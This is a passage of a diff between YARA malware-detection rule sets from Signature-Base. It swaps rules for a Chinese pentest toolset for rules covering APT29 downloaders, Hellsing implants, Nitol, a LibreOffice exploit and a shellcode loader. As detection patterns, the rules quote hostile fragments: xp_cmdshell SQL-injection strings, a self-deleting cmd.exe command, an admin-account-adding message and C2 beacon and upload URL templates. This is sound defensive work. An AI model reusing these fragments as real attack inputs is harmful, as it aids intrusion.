+		$s5 = "Content-Type: image/x-png" fullword ascii
+		$s6 = "Accept-Language: en-US" fullword ascii
+		$s7 = "IISCMD Error:%d" fullword ascii
+		$s8 = "[IISEND=0x%08X][Recv:] 0x%08X %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "414bbd566b700ea021cfae3ad8f4d9b9" or 1 of ( $x* ) or 6 of them ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Arp3_7_Arp3_7 : FILE
+rule SIGNATURE_BASE_M_APT_Downloader_BEATDROP : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file arp3.7.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a4aeefaf-a097-5ba3-a18f-54a1b9752883"
-		date = "2015-06-23"
+		description = "Rule looking for BEATDROP malware"
+		author = "Mandiant"
+		id = "5720870e-8989-59f2-998b-019084d091ce"
+		date = "2022-04-28"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1592-L1607"
+		reference = "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_apr22.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "db641a9dfec103b98548ac7f6ca474715040f25c"
-		logic_hash = "9930d5f13c4dc5cae25dece811911e71e858e3fef51a09c99883699e7feb4908"
-		score = 70
+		logic_hash = "7a766682cc9a057798cc569111bfcb611648c4a052c0dd664d983b80d5891255"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "CnCerT.Net.SKiller.exe" fullword wide
-		$s2 = "www.80sec.com" fullword wide
+		$ntdll1 = "ntdll" ascii fullword
+		$ntdll2 = "C:\\Windows\\System32\\ntdll.dll" ascii fullword nocase
+		$url1 = "api.trello.com" ascii
+		$url2 = "/members/me/boards?key=" ascii
+		$url3 = "/cards?key=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 1MB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Exp_Ms11080 : FILE
+rule SIGNATURE_BASE_M_APT_Downloader_BOOMMIC : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ms11080.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2f5ce2f3-3595-5729-be0c-3f6486cb94fd"
-		date = "2015-06-23"
+		description = "Rule looking for BOOMMIC malware"
+		author = "Mandiant"
+		id = "34ea08a6-5d6f-5cdd-a629-fa36313c98f7"
+		date = "2022-04-28"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1609-L1624"
+		reference = "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_apr22.yar#L19-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
-		logic_hash = "57eb1cdd1108c82da399b0aa869edc9e377e0185896504716bec8925599c07f0"
-		score = 70
+		logic_hash = "c561b19464597f896d31307c0383fbc639cf4211600513e1251a3f59405bfed6"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "[*] command add user 90sec 90sec" fullword ascii
-		$s6 = "[*] Add to Administrators success" fullword ascii
+		$loc_10001000 = { 55 8B EC 8D 45 0C 50 8B 4D 08 51 6A 02 FF 15 [4] 85 C0 74 09 B8 01 00 00 00 EB 04 EB 02 33 C0 5D C3 }
+		$loc_100012fd = {6A 00 8D 55 EC 52 8B 45 D4 50 6A 05 8B 4D E4 51 FF 15 }
+		$func1 = "GetComputerNameExA" ascii
+		$func2 = "HttpQueryInfoA" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 840KB and all of them
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 1MB and ( ( $loc_10001000 and $func1 ) or ( $loc_100012fd and $func2 ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Injection_Transit : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Implantstrings : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Injection_transit.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
-		date = "2015-06-23"
+		description = "detection for Hellsing implants"
+		author = "Kaspersky Lab"
+		id = "00aa5885-ae79-5d68-8587-13d3e8965630"
+		date = "2015-04-07"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1626-L1642"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L2-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f4fef2e3d310494a3c3962a49c7c5a9ea072b2ea"
-		logic_hash = "3e6fe804b9b6e8555c847a165bb0a8b266004653531fe8f11e3937108757f2ff"
-		score = 70
+		logic_hash = "d62dc766a40d1dc7044cc5c9f07a78d36e231b771fafb52442b26514f4c603db"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s0 = "<description>Your app description here</description> " fullword ascii
-		$s4 = "Copyright (C) 2003 ZYDSoft Corp." fullword wide
-		$s5 = "ScriptnackgBun" fullword ascii
+		$a1 = "the file uploaded failed !"
+		$a2 = "ping 127.0.0.1"
+		$b1 = "the file downloaded failed !"
+		$b2 = "common.asp"
+		$c = "xweber_server.exe"
+		$d = "action="
+		$debugpath1 = "d:\\Hellsing\\release\\msger\\" nocase
+		$debugpath2 = "d:\\hellsing\\sys\\xrat\\" nocase
+		$debugpath3 = "D:\\Hellsing\\release\\exe\\" nocase
+		$debugpath4 = "d:\\hellsing\\sys\\xkat\\" nocase
+		$debugpath5 = "e:\\Hellsing\\release\\clare" nocase
+		$debugpath6 = "e:\\Hellsing\\release\\irene\\" nocase
+		$debugpath7 = "d:\\hellsing\\sys\\irene\\" nocase
+		$e = "msger_server.dll"
+		$f = "ServiceMain"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3175KB and all of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $a* ) ) or ( all of ( $b* ) ) or ( $c and $d ) or ( any of ( $debugpath* ) ) or ( $e and $f ) and filesize < 500000
 }
-rule SIGNATURE_BASE_CN_Honker_Safe3Wvs : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Installer : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Safe3WVS.EXE"
-		author = "Florian Roth (Nextron Systems)"
-		id = "035ecb73-3dbc-55d2-8d0c-b71308094d18"
-		date = "2015-06-23"
+		description = "detection for Hellsing xweber/msger installers"
+		author = "Kaspersky Lab"
+		id = "0aca838e-813a-59ee-8a04-7d2f4e854075"
+		date = "2015-04-07"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1644-L1662"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L31-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fee3acacc763dc55df1373709a666d94c9364a7f"
-		logic_hash = "803591fa9427c3001f78ae6274076f3a2f070770d568909d6cba8cee5124ee4c"
-		score = 70
+		logic_hash = "556898e9507835d93e2cf7e21e997b6e64dc154ac675b429f5f8226bf929309c"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s0 = "2TerminateProcess" fullword ascii
-		$s1 = "mscoreei.dll" fullword ascii
-		$s7 = "SafeVS.exe" fullword wide
-		$s8 = "www.safe3.com.cn" fullword wide
-		$s20 = "SOFTWARE\\Classes\\Interface\\" ascii
+		$cmd = "cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\""
+		$a1 = "xweber_install_uac.exe"
+		$a2 = "system32\\cmd.exe" wide
+		$a4 = "S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y="
+		$a5 = "S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg="
+		$a6 = "7dqm2ODf5N/Y2N/m6+br3dnZpunl44g="
+		$a7 = "vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw=="
+		$a8 = "vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSINjl2tyI"
+		$a9 = "C:\\Windows\\System32\\sysprep\\sysprep.exe" wide
+		$a10 = "%SystemRoot%\\system32\\cmd.exe" wide
+		$a11 = "msger_install.dll"
+		$a12 = {00 65 78 2E 64 6C 6C 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		uint16( 0 ) == 0x5a4d and ( $cmd and ( 2 of ( $a* ) ) ) and filesize < 500000
 }
-rule SIGNATURE_BASE_CN_Honker_NBSI_3_0 : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Proxytool : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file NBSI 3.0.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "be8d0dce-4f7f-5f18-9ed0-99fc1dc2b22f"
-		date = "2015-06-23"
+		description = "detection for Hellsing proxy testing tool"
+		author = "Kaspersky Lab"
+		id = "54454f07-11a9-5456-b489-9a9610e53123"
+		date = "2015-04-07"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1664-L1681"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L56-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "93bf0f64bec926e9aa2caf4c28df9af27ec0e104"
-		logic_hash = "017b5f76a3168089f3186134e7a4c0352158bb866228776240f0d014834e6ee0"
-		score = 70
-		quality = 60
+		logic_hash = "8f2656e7b4e6fb5336fb4e39bcec3e99531db532f757b65e3aa12cd2a4334840"
+		score = 50
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s1 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide
-		$s2 = "http://localhost/1.asp?id=16" fullword ascii
-		$s3 = " exec master.dbo.xp_cmdshell @Z--" fullword wide
-		$s4 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide
+		$a1 = "PROXY_INFO: automatic proxy url => %s"
+		$a2 = "PROXY_INFO: connection type => %d"
+		$a3 = "PROXY_INFO: proxy server => %s"
+		$a4 = "PROXY_INFO: bypass list => %s"
+		$a5 = "InternetQueryOption failed with GetLastError() %d"
+		$a6 = "D:\\Hellsing\\release\\exe\\exe\\" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2600KB and 2 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $a* ) ) and filesize < 300000
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_Dubrute_V3_0_RC3_2_0 : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Xkat : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file 2.0.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dda5eea9-da79-5f1f-bbac-9f05ba7e71c9"
-		date = "2015-06-23"
+		description = "detection for Hellsing xKat tool"
+		author = "Kaspersky Lab"
+		id = "c831ce04-8fb2-5790-8aaf-c88b370835ac"
+		date = "2015-04-07"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1683-L1699"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L76-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e8ee982421ccff96121ffd24a3d84e3079f3750f"
-		logic_hash = "8c9be7e8cc04eba6b131acc3c85ac48d7663260a2e4064ad55ed8f40e0875cf4"
-		score = 70
+		logic_hash = "ba74ca11c96e59a04f1cb57b4866df7a581ad94ca81230f2ca5068c8808297aa"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s0 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii
-		$s3 = "Create %d IP@Loginl;Password" fullword ascii
-		$s15 = "UBrute.com" fullword ascii
+		$a1 = "\\Dbgv.sys"
+		$a2 = "XKAT_BIN"
+		$a3 = "release sys file error."
+		$a4 = "driver_load error. "
+		$a5 = "driver_create error."
+		$a6 = "delete file:%s error."
+		$a7 = "delete file:%s ok."
+		$a8 = "kill pid:%d error."
+		$a9 = "kill pid:%d ok."
+		$a10 = "-pid-delete"
+		$a11 = "kill and delete pid:%d error."
+		$a12 = "kill and delete pid:%d ok."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 980KB and 2 of them
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $a* ) ) and filesize < 300000
 }
-rule SIGNATURE_BASE_CN_Honker_Hkmjjiis6 : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Msgertype2 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file hkmjjiis6.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "badf8224-4f09-57aa-ab16-0d70e0b3f88c"
-		date = "2015-06-23"
-		modified = "2023-01-27"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1701-L1718"
+		description = "detection for Hellsing msger type 2 implants"
+		author = "Kaspersky Lab"
+		id = "98f151de-c1c2-56c1-8c64-5d1f437e0742"
+		date = "2015-04-07"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L99-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
-		logic_hash = "a087b9731444152b717e0fbae557004d94f3fb69a4ec65aa38b7a3dab3e3cddf"
-		score = 70
+		logic_hash = "232e4dfd8d236da223240d9a4ec3f8bfa635d51d7376ff19dfa5579af31fc47f"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s14 = "* FROM IIsWebInfo/r" fullword ascii
-		$s19 = "ltithread4ck/" ascii
-		$s20 = "LookupAcc=Sid#" fullword ascii
+		$a1 = "%s\\system\\%d.txt"
+		$a2 = "_msger"
+		$a3 = "http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s"
+		$a4 = "http://%s/data/%s.1000001000"
+		$a5 = "/lib/common.asp?action=user_upload&file="
+		$a6 = "%02X-%02X-%02X-%02X-%02X-%02X"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 175KB and all of them
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $a* ) ) and filesize < 500000
 }
-rule SIGNATURE_BASE_CN_Honker_Clearlogs : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Irene : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file clearlogs.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bfbc339e-5530-5984-94de-be1002f09ca1"
-		date = "2015-06-23"
-		modified = "2023-01-27"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1720-L1736"
+		description = "detection for Hellsing msger irene installer"
+		author = "Kaspersky Lab"
+		id = "b57d1a10-4e5c-511f-b98c-8ce7d766c227"
+		date = "2015-04-07"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L119-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "490f3bc318f415685d7e32176088001679b0da1b"
-		logic_hash = "ed961d2850ba86743177976a4516e7d4a8b90b7e8f180c03f5dbbcc794ad1084"
-		score = 70
+		logic_hash = "e7da04083468dba7045b55181642d7cd57d543fbeda24685ba2ac63799740798"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s2 = "- http://ntsecurity.nu/toolbox/clearlogs/" ascii
-		$s4 = "Error: Unable to clear log - " fullword ascii
+		$a1 = "\\Drivers\\usbmgr.tmp" wide
+		$a2 = "\\Drivers\\usbmgr.sys" wide
+		$a3 = "common_loadDriver CreateFile error!"
+		$a4 = "common_loadDriver StartService error && GetLastError():%d!"
+		$a5 = "irene" wide
+		$a6 = "aPLib v0.43 - the smaller the better"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $a* ) ) and filesize < 500000
 }
-rule SIGNATURE_BASE_CN_Honker_No_Net_Priv_Esc_Adduser : FILE
+
+rule SIGNATURE_BASE_MAL_Nitol_Malware_Jan19_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file AddUser.dll"
+		description = "Detects Nitol Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0f99914c-9349-5870-a3e0-3a5079efdecf"
-		date = "2015-06-23"
+		id = "5b9968a8-31ba-593b-9e01-b69a4e31fe65"
+		date = "2019-01-14"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1738-L1754"
+		reference = "https://twitter.com/shotgunner101/status/1084602413691166721"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mal_nitol.yar#L4-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4c95046be6ae40aee69a433e9a47f824598db2d4"
-		logic_hash = "743e67e2aa95830034db1afda1f346c30467c7b59e030ed27415e5127013be74"
-		score = 70
+		logic_hash = "4607496beb37500637c1e5509b42c0fe6f9e79548c85603819dc966fa2cc2be0"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e"
 
 	strings:
-		$s0 = "PECompact2" fullword ascii
-		$s1 = "adduser" fullword ascii
-		$s5 = "OagaBoxA" fullword ascii
+		$xc1 = { 00 25 75 20 25 73 00 00 00 30 2E 30 2E 30 2E 30
+               00 25 75 20 4D 42 00 00 00 25 64 2A 25 75 25 73
+               00 7E 4D 48 7A }
+		$xc2 = "GET ^&&%$%$^" ascii
+		$n1 = ".htmGET " ascii
+		$s1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
+		$s2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
+		$s3 = "User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0" fullword ascii
+		$s4 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 115KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "286870a926664a5129b8b68ed0d4a8eb" or 1 of ( $x* ) or #n1 > 4 or 4 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Injection : FILE
+rule SIGNATURE_BASE_Gen_Python_Encoded_Adware : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Injection.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1756-L1771"
+		description = "Encoded Python payload for adware"
+		author = "John Lambert @JohnLaTwC"
+		id = "7b4b422b-c960-5ab3-a6a7-a30e416efdec"
+		date = "2018-03-07"
+		modified = "2023-01-06"
+		reference = "https://twitter.com/JohnLaTwC/status/949048002466914304"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_python_encoded_adware.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
-		logic_hash = "8de3e59bd118fbbf1a012c6bfb358dba7c8fb758e3ac17277f2ad3a92c0284ba"
-		score = 70
+		hash = "5d7239be779367e69d2e63ffd9dc6e2a1f79c4e5c6c725e8c5e59a44c0ab2fff"
+		logic_hash = "256b289cfe83384c02aacf9c7e790898ba34988c9be149b39e63791c319bfc4a"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "http://127.0.0.1/6kbbs/bank.asp" fullword ascii
-		$s7 = "jmPost.asp" fullword wide
+		$r1 = "=__import__(\"base64\").b64decode"
+		$s1 = "bytes(map(lambda"
+		$s2 = "[1]^"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
+		filesize < 100KB and @r1 < 100 and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sqlserver_Inject_Creaked : FILE
+rule SIGNATURE_BASE_EXP_Libre_Office_CVE_2018_16858 : CVE_2018_16858 FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SQLServer_inject_Creaked.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9a8a77c2-9e06-5694-8055-4480ab932520"
-		date = "2015-06-23"
+		description = "RCE in Libre Office with crafted ODT file (CVE-2018-16858)"
+		author = "John Lambert @JohnLaTwC / modified by Florian Roth"
+		id = "17a0a569-27bf-57ab-937e-8943442ae604"
+		date = "2019-02-01"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1773-L1788"
+		reference = "https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2018_16858.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "af3c41756ec8768483a4cf59b2e639994426e2c2"
-		logic_hash = "2a7e913a4b7bb6c1270d862108eae7ed3998114b672ca7fa19bd0b199fc27dc2"
-		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash = "95a02b70c117947ff989e3e00868c2185142df9be751a3fefe21f18fa16a1a6f"
+		logic_hash = "6dd34350f24945ba5a594acae96dc00bb200841a645443a70a59006cea1db949"
+		score = 75
+		quality = 83
+		tags = "CVE-2018-16858, FILE"
 
 	strings:
-		$s1 = "http://localhost/index.asp?id=2" fullword ascii
-		$s2 = "Email:zhaoxypass@yahoo.com.cn<br>" fullword ascii
+		$s1 = "xlink:href=\"vnd.sun.star.script:" ascii nocase
+		$s2 = ".py$tempfilepager" ascii nocase
+		$tag = {3c 6f 66 66 69 63 65 3a 64 6f 63 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8110KB and all of them
+		uint32be( 0 ) == 0x3c3f786d and $tag in ( 0 .. 0100 ) and all of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Honker_Webscan_Webscan : FILE
+rule SIGNATURE_BASE_MAL_Shellcode_Loader_Apr23
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file WebScan.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1545494b-9a74-5b2e-921c-e54dd5ac4b51"
-		date = "2015-06-23"
+		description = "Detects Shellcode loader as seen being used by Gopuram backdoor"
+		author = "X__Junior (Nextron Systems)"
+		id = "363b67d6-9cac-513d-a545-1f256667bab8"
+		date = "2023-04-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1790-L1805"
+		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_gopuram_apr23.yar#L3-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a0b0e2422e0e9edb1aed6abb5d2e3d156b7c8204"
-		logic_hash = "a714fe90dce33180b8074e2c3a16fc1829ed2a7b387eb92aec8a147cff9e57a4"
-		score = 70
+		logic_hash = "e4e423158757c80b5e4e77f6a343323a87798c6697cf6a832aa01a146712b250"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "6ce5b6b4cdd6290d396465a1624d489c7afd2259a4d69b73c6b0ba0e5ad4e4ad"
+		hash2 = "b56279136d816a11cf4db9fc1b249da04b3fa3aef4ba709b20cdfbe572394812"
 
 	strings:
-		$s1 = "wwwscan.exe" fullword wide
-		$s2 = "WWWScan Gui" fullword wide
+		$op1 = { 41 C1 CB 0D 0F BE 03 48 FF C3 44 03 D8 80 7B ?? 00 75 ?? 41 8D 04 13 3B C6 74 }
+		$op2 = { B9 49 F7 02 78 4C 8B E8 E8 ?? ?? ?? ?? B9 58 A4 53 E5 48 89 44 24 ?? E8 ?? ?? ?? ?? B9 10 E1 8A C3 48 8B F0 E8 ?? ?? ?? ?? B9 AF B1 5C 94 48 89 44 24 ?? E8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
